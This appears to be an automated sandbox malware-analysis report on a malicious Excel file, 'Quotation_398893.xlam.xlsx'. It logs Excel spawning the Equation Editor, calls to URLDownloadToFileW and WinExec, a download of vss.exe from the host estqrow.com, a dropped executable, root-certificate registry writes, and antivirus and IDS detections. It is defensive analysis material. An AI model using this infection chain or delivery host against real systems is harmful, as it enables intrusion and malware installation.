Source: Quotation_398893.xlam.xlsx |
Avira: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Virustotal: Detection: 6% |
Perma Link |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Virustotal: Detection: 6% |
Perma Link |
Source: Quotation_398893.xlam.xlsx |
ReversingLabs: Detection: 71% |
Source: Quotation_398893.xlam.xlsx |
Virustotal: Detection: 50% |
Perma Link |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Network connect: IP: 154.38.177.76 Port: 443 |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: unknown |
HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2 |
Source: |
Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610775 WinExec,ExitProcess, |
1_2_03610775 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW, |
1_2_036106C1 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361072A URLDownloadToFileW, |
1_2_0361072A |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610649 URLDownloadToFileW, |
1_2_03610649 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_036106DB URLDownloadToFileW, |
1_2_036106DB |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610795 ExitProcess, |
1_2_03610795 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610614 ExitProcess, |
1_2_03610614 |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4x nop then dec eax |
4_2_000007FE8B6F4201 |
Source: global traffic |
DNS query: name: estqrow.com |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
TCP traffic: 154.38.177.76:443 -> 192.168.2.22:49161 |
Source: Joe Sandbox View |
ASN Name: COGENT-174US COGENT-174US |
Source: Joe Sandbox View |
JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b |
Source: Network traffic |
Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.22:49161 -> 154.38.177.76:443 |
Source: global traffic |
HTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_036106C1 LoadLibraryW,URLDownloadToFileW, |
1_2_036106C1 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /rt/vss.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: estqrow.comConnection: Keep-Alive |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: global traffic |
DNS traffic detected: DNS query: estqrow.com |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0% |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0- |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.comodoca.com05 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.entrust.net03 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ocsp.entrust.net0D |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.0000000000314000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/ |
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.468050895.00000000002C4000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exe |
Source: EQNEDT32.EXE, 00000001.00000002.468879887.0000000007210000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exeC: |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.00000000002DE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exehhC: |
Source: EQNEDT32.EXE, 00000001.00000002.468180614.0000000003610000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://estqrow.com/rt/vss.exej |
Source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://secure.comodo.com/CPS0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49161 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49161 |
Source: unknown |
HTTPS traffic detected: 154.38.177.76:443 -> 192.168.2.22:49161 version: TLS 1.2 |
Source: sheet1.xml, type: SAMPLE |
Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Jump to dropped file |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Jump to dropped file |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Memory allocated: 770B0000 page execute and read and write |
Jump to behavior |
Source: Quotation_398893.xlam.xlsx |
OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false |
Source: sheet1.xml, type: SAMPLE |
Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing |
Source: classification engine |
Classification label: mal100.expl.winXLSX@4/4@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Quotation_398893.xlam.xlsx |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Mutant created: NULL |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR8A54.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: Quotation_398893.xlam.xlsx |
ReversingLabs: Detection: 71% |
Source: Quotation_398893.xlam.xlsx |
Virustotal: Detection: 50% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe |
|
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process created: C:\Users\user\AppData\Local\Temp\opponbvew.exe C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64win.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: wow64cpu.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: msi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rpcrtremote.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: webio.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: credssp.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: bcrypt.dll |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: bcrypt.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Section loaded: rpcrtremote.dll |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: Quotation_398893.xlam.xlsx |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: |
Binary string: F:\Pendriver\programas\crc vb.net\Teste Ok\Teste Ok\obj\Debug\TesteOk.pdb source: EQNEDT32.EXE, 00000001.00000002.468050895.000000000036C000.00000004.00000020.00020000.00000000.sdmp, opponbvew.exe, 00000004.00000000.467095355.0000000000CD6000.00000008.00000001.01000000.00000004.sdmp, vss[1].exe.1.dr, opponbvew.exe.1.dr |
Source: Quotation_398893.xlam.xlsx |
Initial sample: OLE indicators vbamacros = False |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_0361006C push eax; ret |
1_2_0361006D |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Code function: 1_2_03610278 push edi; iretd |
1_2_0361027C |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4_2_000007FE8B6F00BD pushad ; iretd |
4_2_000007FE8B6F00C1 |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Code function: 4_2_000007FE8B6F00CD pushad ; iretd |
4_2_000007FE8B6F00C1 |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Jump to dropped file |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vss[1].exe |
Jump to dropped file |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: 130000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Memory allocated: 1A610000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe |
Thread delayed: delay time: 922337203685477 |
Jump to behavior |
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524 |
Thread sleep time: -240000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3744 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\opponbvew.exe TID: 3676 |
Thread sleep time: -922337203685477s >= -30000s |
Jump to behavior |
